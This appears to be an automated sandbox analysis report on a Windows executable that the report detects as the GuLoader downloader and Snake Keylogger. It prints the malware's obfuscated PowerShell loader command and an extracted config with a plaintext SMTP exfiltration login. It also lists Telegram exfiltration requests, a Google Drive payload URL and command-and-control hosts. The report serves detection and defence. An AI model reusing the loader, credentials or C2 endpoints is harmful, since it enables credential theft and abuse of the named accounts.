
Windows Analysis Report
URGENTE Ref.exe

Overview

General Information

Sample name: URGENTE Ref.exe
Analysis ID: 1633323
MD5: 723743eb9cb98f3e735f7a3503b32ae7
SHA1: 1415be8f7022b11fa0954a2cacec1f9c6433f76d
SHA256: c2c0e9cc144248554a3b91e723cd1770dbaa2d6acdd00e9021f5587f080c9286
Tags: exe, user-lowmal3

Detection

GuLoader, Snake Keylogger
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • URGENTE Ref.exe (PID: 3976 cmdline: "C:\Users\user\Desktop\URGENTE Ref.exe" MD5: 723743EB9CB98F3E735F7A3503B32AE7)
    • powershell.exe (PID: 996 cmdline: "powershell.exe" -windowstyle minimized "$Unsexual24=gc -Raw 'C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Theopneustic\Portentousness.Unm177';$Authorize=$Unsexual24.SubString(53440,3);.$Authorize($Unsexual24)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Undismembered.exe (PID: 7924 cmdline: "C:\Users\user\AppData\Local\Temp\Undismembered.exe" MD5: 723743EB9CB98F3E735F7A3503B32AE7)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "pedidos@bsp.com.es", "Password": "81xINaSf", "Host": "mail.bsp.com.es", "Port": "587", "Version": "4.4"}
Source: 0000000A.00000002.2495516741.0000000020581000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_SnakeKeylogger; Description: Yara detected Snake Keylogger; Author: Joe Security
Source: 00000002.00000002.1618451140.000000000B086000.00000040.00001000.00020000.00000000.sdmp; Rule: JoeSecurity_GuLoader_2; Description: Yara detected GuLoader; Author: Joe Security
Source: Process Memory Space: Undismembered.exe PID: 7924; Rule: JoeSecurity_CredentialStealer; Description: Yara detected Credential Stealer; Author: Joe Security
Source: Process Memory Space: Undismembered.exe PID: 7924; Rule: JoeSecurity_TelegramRAT; Description: Yara detected Telegram RAT; Author: Joe Security

System Summary

Source: Network Connection; Author: frack113; Data: DestinationIp: 82.98.167.108, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\Undismembered.exe, Initiated: true, ProcessId: 7924, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 63196
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "powershell.exe" -windowstyle minimized "$Unsexual24=gc -Raw 'C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Theopneustic\Portentousness.Unm177';$Authorize=$Unsexual24.SubString(53440,3);.$Authorize($Unsexual24)", CommandLine: "powershell.exe" -windowstyle minimized "$Unsexual24=gc -Raw 'C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Theopneustic\Portentousness.Unm177';$Authorize=$Unsexual24.SubString(53440,3);.$Authorize($Unsexual24)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\URGENTE Ref.exe", ParentImage: C:\Users\user\Desktop\URGENTE Ref.exe, ParentProcessId: 3976, ParentProcessName: URGENTE Ref.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Unsexual24=gc -Raw 'C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Theopneustic\Portentousness.Unm177';$Authorize=$Unsexual24.SubString(53440,3);.$Authorize($Unsexual24)", ProcessId: 996, ProcessName: powershell.exe

Suricata IDS alerts:

Timestamp                        SID      Severity  Classtype                                      Source IP    Source Port  Destination IP   Destination Port  Protocol
2025-03-10T08:38:05.897529+0100  2060048  1         Malware Command and Control Activity Detected  192.168.2.6  63196        82.98.167.108    587               TCP
2025-03-10T08:39:13.606813+0100  2803305  3         Unknown Traffic                                192.168.2.6  49702        104.21.32.1      443               TCP
2025-03-10T08:39:16.627388+0100  2803305  3         Unknown Traffic                                192.168.2.6  49704        104.21.32.1      443               TCP
2025-03-10T08:39:19.653023+0100  2803305  3         Unknown Traffic                                192.168.2.6  49706        104.21.32.1      443               TCP
2025-03-10T08:39:22.752130+0100  2803305  3         Unknown Traffic                                192.168.2.6  49708        104.21.32.1      443               TCP
2025-03-10T08:39:08.177900+0100  2803274  2         Potentially Bad Traffic                        192.168.2.6  49700        132.226.8.169    80                TCP
2025-03-10T08:39:11.084381+0100  2803274  2         Potentially Bad Traffic                        192.168.2.6  49700        132.226.8.169    80                TCP
2025-03-10T08:39:14.474735+0100  2803274  2         Potentially Bad Traffic                        192.168.2.6  49703        132.226.8.169    80                TCP
2025-03-10T08:38:59.903168+0100  2803270  2         Potentially Bad Traffic                        192.168.2.6  49696        142.250.185.142  443               TCP
2025-03-10T08:39:38.178663+0100  1810007  1         Potentially Bad Traffic                        192.168.2.6  63195        149.154.167.220  443               TCP

AV Detection

Source: 0000000A.00000002.2495516741.0000000020581000.00000004.00000800.00020000.00000000.sdmp; Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "pedidos@bsp.com.es", "Password": "81xINaSf", "Host": "mail.bsp.com.es", "Port": "587", "Version": "4.4"}
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe; ReversingLabs: Detection: 31%
Source: URGENTE Ref.exe; Virustotal: Detection: 33%
Source: URGENTE Ref.exe; ReversingLabs: Detection: 31%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.9% probability

Location Tracking

Source: unknown; DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe; Code function: 10_2_226E87A8 CryptUnprotectData,10_2_226E87A8
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe; Code function: 10_2_226E8EF1 CryptUnprotectData,10_2_226E8EF1
Source: URGENTE Ref.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown; HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49701 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:49696 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 172.217.18.97:443 -> 192.168.2.6:49698 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:63195 version: TLS 1.2
Source: URGENTE Ref.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\URGENTE Ref.exe; Code function: 0_2_00406167 FindFirstFileA,FindClose,0_2_00406167
Source: C:\Users\user\Desktop\URGENTE Ref.exe; Code function: 0_2_00405705 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405705
Source: C:\Users\user\Desktop\URGENTE Ref.exe; Code function: 0_2_00402688 FindFirstFileA,0_2_00402688
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe; Code function: 10_2_00406167 FindFirstFileA,FindClose,10_2_00406167
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe; Code function: 10_2_00405705 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,10_2_00405705
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe; Code function: 10_2_00402688 FindFirstFileA,10_2_00402688
Source: C:\Users\user\Desktop\URGENTE Ref.exe; File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\URGENTE Ref.exe; File opened: C:\Users\user\AppData\Local\Microsoft
Source: C:\Users\user\Desktop\URGENTE Ref.exe; File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Desktop\URGENTE Ref.exe; File opened: C:\Users\user
Source: C:\Users\user\Desktop\URGENTE Ref.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Windows
Source: C:\Users\user\Desktop\URGENTE Ref.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache

Networking

Source: Network traffic; Suricata IDS: 2060048 - Severity 1 - ET MALWARE Snake Keylogger Exfil via SMTP (VIP Recovery) : 192.168.2.6:63196 -> 82.98.167.108:587
Source: Network traffic; Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:63195 -> 149.154.167.220:443
Source: unknown; DNS query: name: api.telegram.org
Source: global traffic; TCP traffic: 192.168.2.6:63196 -> 82.98.167.108:587
Source: global traffic; HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic; HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:579569%0D%0ADate%20and%20Time:%2011/03/2025%20/%2007:39:26%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20579569%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: Joe Sandbox View; IP Address: 132.226.8.169
Source: Joe Sandbox View; IP Address: 149.154.167.220
Source: Joe Sandbox View; ASN Name: DINAHOSTING-ASES
Source: Joe Sandbox View; JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View; JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown; DNS query: name: checkip.dyndns.org
Source: unknown; DNS query: name: reallyfreegeoip.org
Source: Network traffic; Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49703 -> 132.226.8.169:80
Source: Network traffic; Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49700 -> 132.226.8.169:80
Source: Network traffic; Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49706 -> 104.21.32.1:443
Source: Network traffic; Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49704 -> 104.21.32.1:443
Source: Network traffic; Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49708 -> 104.21.32.1:443
Source: Network traffic; Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49696 -> 142.250.185.142:443
Source: Network traffic; Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49702 -> 104.21.32.1:443
Source: global traffic; HTTP traffic detected: GET /uc?export=download&id=1zH4lzTrOb74mkiGTG8MqxioQ1lqpMPyE HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 | Host: drive.google.com | Cache-Control: no-cache
Source: global traffic; HTTP traffic detected: GET /download?id=1zH4lzTrOb74mkiGTG8MqxioQ1lqpMPyE&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49701 version: TLS 1.0
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1zH4lzTrOb74mkiGTG8MqxioQ1lqpMPyE HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /download?id=1zH4lzTrOb74mkiGTG8MqxioQ1lqpMPyE&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:579569%0D%0ADate%20and%20Time:%2011/03/2025%20/%2007:39:26%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20579569%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: drive.google.com
          Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
          Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
          Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
          Source: global trafficDNS traffic detected: DNS query: mail.bsp.com.es
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 10 Mar 2025 07:39:37 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
          Source: Undismembered.exe, 0000000A.00000002.2495516741.000000002076C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
          Source: Undismembered.exe, 0000000A.00000002.2495516741.0000000020581000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
          Source: Undismembered.exe, 0000000A.00000002.2495516741.0000000020581000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
          Source: Undismembered.exe, 0000000A.00000002.2495516741.0000000020581000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
          Source: Undismembered.exe, 0000000A.00000002.2495516741.0000000020581000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
          Source: Undismembered.exe, 0000000A.00000002.2495516741.000000002077B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail.bsp.com.es
          Source: Undismembered.exe, Undismembered.exe, 0000000A.00000000.1599838202.0000000000409000.00000008.00000001.01000000.00000009.sdmp, URGENTE Ref.exe, Undismembered.exe.2.dr | String found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: URGENTE Ref.exe, Undismembered.exe.2.dr | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: powershell.exe, 00000002.00000002.1603604758.000000000625A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000002.00000002.1601132582.0000000005346000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000002.00000002.1601132582.0000000005346000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: powershell.exe, 00000002.00000002.1601132582.00000000051F1000.00000004.00000800.00020000.00000000.sdmp, Undismembered.exe, 0000000A.00000002.2495516741.0000000020581000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000002.00000002.1601132582.0000000005346000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
          Source: Undismembered.exe, 0000000A.00000002.2495516741.0000000020581000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081
          Source: powershell.exe, 00000002.00000002.1601132582.0000000005346000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: Undismembered.exe, 0000000A.00000002.2496698754.000000002185C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org?q=
          Source: powershell.exe, 00000002.00000002.1601132582.00000000051F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
          Source: powershell.exe, 00000002.00000002.1601132582.0000000005346000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
          Source: Undismembered.exe, 0000000A.00000002.2495516741.0000000020663000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
          Source: Undismembered.exe, 0000000A.00000002.2495516741.0000000020663000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
          Source: Undismembered.exe, 0000000A.00000002.2495516741.0000000020663000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
          Source: Undismembered.exe, 0000000A.00000002.2495516741.0000000020663000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:579569%0D%0ADate%20a
          Source: Undismembered.exe, 0000000A.00000003.1728189274.00000000040E2000.00000004.00000020.00020000.00000000.sdmp, Undismembered.exe, 0000000A.00000003.1792265177.00000000040C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://apis.google.com
          Source: Undismembered.exe, 0000000A.00000002.2496698754.000000002185C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: Undismembered.exe, 0000000A.00000002.2496698754.0000000021897000.00000004.00000800.00020000.00000000.sdmp, Undismembered.exe, 0000000A.00000002.2496698754.000000002185C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: Undismembered.exe, 0000000A.00000002.2496698754.0000000021897000.00000004.00000800.00020000.00000000.sdmp, Undismembered.exe, 0000000A.00000002.2496698754.000000002185C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: Undismembered.exe, 0000000A.00000002.2495516741.0000000020710000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
          Source: Undismembered.exe, 0000000A.00000002.2495516741.0000000020710000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en4
          Source: powershell.exe, 00000002.00000002.1603604758.000000000625A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000002.00000002.1603604758.000000000625A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000002.00000002.1603604758.000000000625A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
          Source: Undismembered.exe, 0000000A.00000002.2478474026.0000000004038000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/
          Source: Undismembered.exe, 0000000A.00000002.2478474026.0000000004038000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/_
          Source: Undismembered.exe, 0000000A.00000002.2479186635.0000000005CB0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1zH4lzTrOb74mkiGTG8MqxioQ1lqpMPyE
          Source: Undismembered.exe, 0000000A.00000002.2478474026.0000000004073000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1zH4lzTrOb74mkiGTG8MqxioQ1lqpMPyE-
          Source: Undismembered.exe, 0000000A.00000002.2478474026.0000000004073000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1zH4lzTrOb74mkiGTG8MqxioQ1lqpMPyEK
          Source: Undismembered.exe, 0000000A.00000002.2478474026.00000000040A3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/
          Source: Undismembered.exe, 0000000A.00000003.1792265177.00000000040C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1zH4lzTrOb74mkiGTG8MqxioQ1lqpMPyE&export=download
          Source: Undismembered.exe, 0000000A.00000002.2478474026.00000000040A3000.00000004.00000020.00020000.00000000.sdmp, Undismembered.exe, 0000000A.00000003.1792265177.00000000040C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/n
